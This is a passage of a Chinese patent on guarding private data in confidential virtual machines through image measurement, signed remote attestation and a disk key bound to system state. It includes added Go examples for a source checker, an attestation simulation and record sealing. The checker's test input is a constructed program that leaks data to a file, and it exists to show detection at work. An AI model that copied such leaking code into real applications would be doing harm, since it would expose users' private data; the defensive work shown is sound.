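		if !ok {
			return true
		}
		name := pkg.Name + "." + sel.Sel.Name
		if kind, hit := sensitiveCalls[name]; hit {
			out = append(out, Finding{Kind: kind, Call: name, Line: fset.Position(call.Pos()).Line})
		}
		return true
	})
	return out, nil
}

// Alarms compares the findings with the calls the data provider agreed to and
// returns one alarm prompt for every call outside that list.
func Alarms(findings []Finding, allowed map[string]bool) []string {
	var msgs []string
	for _, f := range findings {
		if !allowed[f.Call] {
			msgs = append(msgs, fmt.Sprintf("ALARM: unexpected %s call %s at line %d", f.Kind, f.Call, f.Line))
		}
	}
	return msgs
}

// sampleSrc is a constructed target application: it is expected to POST its
// result to one endpoint, but it also writes private data to a file.
const sampleSrc = `package main

import (
	"net/http"
	"os"
)

func main() {
	resp, _ := http.Post("https://example.invalid/result", "text/plain", nil)
	_ = resp
	_ = os.WriteFile("/tmp/out.txt", []byte("private"), 0o600)
}
`

func main() {
	findings, err := CheckSource(sampleSrc)
	if err != nil {
		panic(err)
	}
	for _, m := range Alarms(findings, map[string]bool{"http.Post": true}) {
		fmt.Println(m)
	}
}
```

Run as a single file with `go run`; for the constructed sample it reports the unexpected `os.WriteFile` call on line 11 and stays silent about the agreed `http.Post`. The scan is deliberately syntactic (package-qualified selector calls only), so a checker used in practice would also have to resolve aliased imports and calls made through function values, which the data provider's review of the dependency libraries and system calls is meant to cover.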
Further, in an embodiment, the secure firmware is further configured to sign a target data structure, the target data structure including the metric value, and the remote report further including the signature;
the step of sending the remote report to the first checking module comprises:
the acquisition module verifies the signature in the remote report and, if the signature verification passes, sends the remote report to the first checking module.
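The remote report flow described in the system embodiment, in steps S11 to S14 and in the signature step just above can be exercised end to end in a small simulation. The following is an added example, not code from the patent or its applicant: the secure firmware is modelled as a process that holds a platform endorsement key (PEK), the PEK certificate is reduced to a one-link chain in which a vendor root key endorses the PEK public key, the target data structure carries the measurement value, a chip ID and a verifier-supplied random number, and the verification performs in order the certificate check, the signature check, the nonce check and the comparison of the measurement value with the value the data provider approved. Curve choice (P-256), the field layout of the report and the constructed image bytes are assumptions for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Report is the target data structure the secure firmware signs: image
// measurement, chip ID and a nonce supplied by the verifying side.
type Report struct {
	Measurement [32]byte
	ChipID      [16]byte
	Nonce       [32]byte
}

// Bytes serialises the report in a fixed order so both sides hash the same octets.
func (r Report) Bytes() []byte {
	return append(append(append([]byte{}, r.Measurement[:]...), r.ChipID[:]...), r.Nonce[:]...)
}

// PEKCert stands in for the PEK certificate: the PEK public key endorsed by the
// vendor root key, i.e. a one-link certificate chain (assumption for the example).
type PEKCert struct {
	Pub *ecdsa.PublicKey
	Sig []byte
}

// pubBytes encodes a P-256 public key as fixed-width X||Y for hashing.
func pubBytes(k *ecdsa.PublicKey) []byte {
	return append(k.X.FillBytes(make([]byte, 32)), k.Y.FillBytes(make([]byte, 32))...)
}

func sign(k *ecdsa.PrivateKey, msg []byte) ([]byte, error) {
	h := sha256.Sum256(msg)
	return ecdsa.SignASN1(rand.Reader, k, h[:])
}

func verify(k *ecdsa.PublicKey, msg, sig []byte) bool {
	h := sha256.Sum256(msg)
	return ecdsa.VerifyASN1(k, h[:], sig)
}

// NewPlatform simulates provisioning: the vendor root endorses a fresh PEK that
// in hardware would live inside the CPU's secure firmware.
func NewPlatform(root *ecdsa.PrivateKey) (*ecdsa.PrivateKey, PEKCert, error) {
	pek, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, PEKCert{}, err
	}
	sig, err := sign(root, pubBytes(&pek.PublicKey))
	return pek, PEKCert{Pub: &pek.PublicKey, Sig: sig}, err
}

// VerifyReport performs the checks the acquisition module and first checking
// module make together: certificate chain, report signature, nonce freshness and
// comparison of the measurement with the value the data provider approved.
func VerifyReport(root *ecdsa.PublicKey, cert PEKCert, r Report, sig []byte, nonce, expected [32]byte) error {
	switch {
	case !verify(root, pubBytes(cert.Pub), cert.Sig):
		return errors.New("PEK certificate is not endorsed by the trusted root")
	case !verify(cert.Pub, r.Bytes(), sig):
		return errors.New("remote report signature is invalid")
	case r.Nonce != nonce:
		return errors.New("nonce mismatch: the report may be replayed")
	case r.Measurement != expected:
		return errors.New("measurement does not match the approved image")
	}
	return nil
}

// DemoAttestation runs the flow on a constructed image. tamper alters the image
// after it was approved; replay makes the firmware sign a stale nonce.
func DemoAttestation(tamper, replay bool) error {
	root, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return err
	}
	pek, cert, err := NewPlatform(root)
	if err != nil {
		return err
	}
	image := []byte("constructed unikernel image bytes") // constructed sample, not a real image
	expected := sha256.Sum256(image)                    // value approved by the data provider
	if tamper {
		image[0] ^= 0xff
	}
	var nonce [32]byte
	if _, err := rand.Read(nonce[:]); err != nil {
		return err
	}
	r := Report{Measurement: sha256.Sum256(image), ChipID: [16]byte{0xab}, Nonce: nonce}
	if replay {
		r.Nonce = [32]byte{}
	}
	sig, err := sign(pek, r.Bytes()) // the secure firmware signs the target data structure with the PEK
	if err != nil {
		return err
	}
	return VerifyReport(&root.PublicKey, cert, r, sig, nonce, expected)
}

func main() {
	fmt.Println("honest:", DemoAttestation(false, false), "| tampered:", DemoAttestation(true, false), "| replayed:", DemoAttestation(false, true))
}
```

The order of the checks matters: the certificate and signature are verified before the measurement value is even read, so a measurement that merely looks correct is never trusted unless it was produced by firmware whose PEK the root endorses, and the nonce check rejects a genuine but old report being presented a second time.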
Further, in an embodiment, the private data protection system further includes an encrypted data disk;
the method for protecting the privacy data further comprises the following steps:
the encrypted data disk stores, in encrypted form, the data that the target application program needs to persist while running, where the key is bound to the system state and is valid only when the current system state is consistent with the system state at the time the key was bound.
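The binding of the disk key to the system state, described for the encrypted data disk in the system embodiment and in the step just above, can be realised by deriving the key from a platform secret together with the system state and authenticating the stored data with it. The following is an added example, not code from the patent or its applicant: the key is derived with HMAC-SHA256 over a platform root secret and the current system state (here taken to be the image measurement), records are sealed with AES-256-GCM, and a record sealed in one state fails to open once the state changes, because the derived key, and hence the GCM authentication tag, no longer matches. The root secret, the two state values and the label string are constructed assumptions for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// DiskKey derives the data-disk key from a platform root secret and the system
// state (here the image measurement). The state is mixed into the derivation,
// so a different state yields a different key and sealed data stays closed.
func DiskKey(rootSecret []byte, systemState [32]byte) []byte {
	m := hmac.New(sha256.New, rootSecret)
	m.Write([]byte("encrypted-data-disk/v1")) // domain separation label (assumption)
	m.Write(systemState[:])
	return m.Sum(nil) // 32 bytes, used as an AES-256 key
}

func newAEAD(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal encrypts one disk record; the output is nonce || ciphertext || tag.
func Seal(key, plaintext []byte) ([]byte, error) {
	aead, err := newAEAD(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return aead.Seal(nonce, nonce, plaintext, nil), nil
}

// Unseal decrypts a record; the GCM tag check fails if the key (and so the
// system state it was derived from) differs from the one used at seal time.
func Unseal(key, sealed []byte) ([]byte, error) {
	aead, err := newAEAD(key)
	if err != nil {
		return nil, err
	}
	ns := aead.NonceSize()
	if len(sealed) < ns {
		return nil, errors.New("sealed record too short")
	}
	return aead.Open(nil, sealed[:ns], sealed[ns:], nil)
}

// DemoSealing seals a record while the system is in stateA and reports whether
// it opens again in stateA and whether it opens after the state changes to stateB.
func DemoSealing() (openSame, openChanged bool, err error) {
	rootSecret := []byte("constructed platform root secret, not a real one") // constructed sample
	stateA := sha256.Sum256([]byte("approved unikernel image"))              // constructed measurement
	stateB := sha256.Sum256([]byte("modified unikernel image"))              // constructed measurement
	record := []byte("persisted private data")

	sealed, err := Seal(DiskKey(rootSecret, stateA), record)
	if err != nil {
		return false, false, err
	}
	got, err := Unseal(DiskKey(rootSecret, stateA), sealed)
	openSame = err == nil && bytes.Equal(got, record)
	_, err = Unseal(DiskKey(rootSecret, stateB), sealed)
	openChanged = err == nil
	return openSame, openChanged, nil
}

func main() {
	same, changed, err := DemoSealing()
	fmt.Printf("open in bound state: %v, open after state change: %v, err: %v\n", same, changed, err)
}
```

Because the key is never stored but re-derived from the live state, a host that copies the disk image obtains only authenticated ciphertext, and a modified image cannot produce the key the original image bound the data to.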
Further, in one embodiment, the packaging module compiles the target application on the basis of a library operating system to form a unikernel image.
Further, in an embodiment, the secure firmware performs integrity measurement on the image file and encrypts and decrypts the memory of the virtual machine based on AMD SEV technology or Hygon CSV technology.
The analysis of each step in the method for protecting private data corresponds to the functions and implementation processes of each component in the system for protecting private data, which are not described in detail herein.
In a third aspect, an embodiment of the present invention provides a private data protection apparatus, which may be an apparatus having a data processing function, such as a Personal Computer (PC), a notebook computer, a server, or the like.
Fig. 4 is a schematic diagram of a hardware structure of a private data protection device according to an embodiment of the present invention.
Referring to fig. 4, in an embodiment of the present invention, the private data protection device may include a processor 1001 (e.g., a central processing unit, CPU), a communication bus 1002, a user interface 1003, a network interface 1004, and a memory 1005. The communication bus 1002 is used to enable communication between these components; the user interface 1003 may include a display screen and an input unit such as a keyboard; the network interface 1004 may optionally include a standard wired interface or a wireless interface (e.g., a Wireless Fidelity, Wi-Fi interface); the memory 1005 may be a high-speed random access memory (RAM) or a non-volatile memory such as a disk memory, and may alternatively be a storage device independent of the processor 1001. Those skilled in the art will appreciate that the hardware configuration shown in fig. 4 does not limit the invention and may include more or fewer components than shown, combine certain components, or arrange the components differently.
With continued reference to fig. 4, an operating system, a network communication module, a user interface module, and a privacy data protection program may be included in the memory 1005 of fig. 4, which is a type of computer storage medium. The processor 1001 may call a private data protection program stored in the memory 1005 and execute the private data protection method provided by the embodiment of the present invention.
In a fourth aspect, embodiments of the present invention also provide a readable storage medium.
A private data protection program is stored on the readable storage medium, and when executed by a processor the private data protection program implements the steps of the private data protection method.
The method implemented when the privacy data protection program is executed may refer to various embodiments of the privacy data protection method of the present invention, and will not be described herein.
It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.
The foregoing embodiment numbers of the present invention are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
From the above description of the embodiments, it will be clear to those skilled in the art that the above-described embodiment method may be implemented by means of software plus a necessary general hardware platform, but of course may also be implemented by means of hardware, but in many cases the former is a preferred embodiment. Based on such understanding, the technical solution of the present invention may be embodied essentially or in a part contributing to the prior art in the form of a software product stored in a storage medium (e.g. ROM/RAM, magnetic disk, optical disk) as described above, comprising several instructions for causing a terminal device to perform the method according to the embodiments of the present invention.
The foregoing description is only of the preferred embodiments of the present invention, and is not intended to limit the scope of the invention, but rather is intended to cover any equivalents of the structures or equivalent processes disclosed herein or in the alternative, which may be employed directly or indirectly in other related arts.

Claims (10)

1. A private data protection system, characterized by comprising a packaging module, a virtual machine, a secure firmware, an acquisition module and a first checking module;
the packaging module is used for packaging the target application program, the library depending on the target application program and the system call into an image file, and the image file is used as the running software of the virtual machine;
the security firmware is arranged in a CPU of the host machine and used for encrypting and decrypting the memory of the virtual machine, carrying out integrity measurement on the image file, and starting the virtual machine if the measurement passes;
the acquisition module is arranged in the target application program and is used for acquiring a remote report from the secure firmware and sending the remote report to the first inspection module, wherein the remote report is generated by the secure firmware and contains the measurement value of the image file;
the first checking module is configured to check the metric value in the remote report for a data provider to provide private data to the target application after the metric value check passes.
2. The private data protection system of claim 1, further comprising a second inspection module;
and the second checking module is used for checking the function of the source code corresponding to the target application program and the library and the system call which the target application program depends on before the target application program is packaged, and outputting an alarm prompt if checking the network call function abnormality of the source code or checking the file writing function abnormality of the source code.
3. The private data protection system of claim 2, wherein the first checking module is further configured to determine, based on the metric, the target application and its dependent library and system call corresponding source code and check a function of the source code after the metric is checked, so that the data provider provides private data to the target application after the source code function check is passed.
4. The privacy data protection system of claim 1, wherein the secure firmware is further to sign a target data structure, the target data structure containing the metric value, the remote report further containing the signature;
the acquisition module is further used for checking the signature in the remote report, and if the signature passes the check, the remote report is sent to the first checking module.
5. The private data protection system of claim 1, wherein the private data protection system further comprises an encrypted data disk;
the encrypted data disk is used for carrying out encrypted storage on data which needs to be durable when the target application program runs, wherein a secret key is bound with a system state, and the secret key is effective when the current state of the system is consistent with the system state when the secret key is bound.
6. The private data protection system of any one of claims 1 to 5, wherein the packaging module compiles the target application based on a library operating system to form a unikernel image.
7. The private data protection system of any one of claims 1 to 5, wherein the secure firmware performs integrity measurement on the image file and encrypts and decrypts the memory of the virtual machine based on AMD SEV technology or Hygon CSV technology.
8. A method for protecting private data, applied to a private data protection system comprising a packaging module, a virtual machine, a secure firmware, an acquisition module and a first checking module, the method comprising the following steps:
the packaging module packages the target application program, the library depending on the target application program and the system call into an image file, wherein the image file is used as the running software of the virtual machine;
the security firmware encrypts and decrypts the memory of the virtual machine, carries out integrity measurement on the image file, and starts the virtual machine if the measurement passes, wherein the security firmware is arranged in a CPU of a host machine;
the acquisition module acquires a remote report from the secure firmware and sends the remote report to the first inspection module, wherein the acquisition module is arranged in the target application program, and the remote report is generated by the secure firmware and contains a measurement value of the image file;
the first inspection module inspects the metrics in the remote report for a data provider to provide private data to the target application after the metrics inspection passes.
9. A private data protection device comprising a processor, a memory, and a private data protection program stored on the memory and executable by the processor, wherein the private data protection program, when executed by the processor, implements the steps of the private data protection method of claim 8.
10. A readable storage medium, wherein a private data protection program is stored on the readable storage medium, wherein the private data protection program, when executed by a processor, implements the steps of the private data protection method of claim 8.
CN202310917847.5A 2023-07-25 2023-07-25 Private data protection system, method, device and readable storage medium Pending CN116975912A (en)

Priority Applications (1)

Application Number | Priority Date | Filing Date | Title
CN202310917847.5A (CN116975912A, en) | 2023-07-25 | 2023-07-25 | Private data protection system, method, device and readable storage medium

Publications (1)

Publication Number | Publication Date
CN116975912A | 2023-10-31

Family ID: 88478972

Country Status (1)

Country | Link
CN (1) | CN116975912A (en)


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination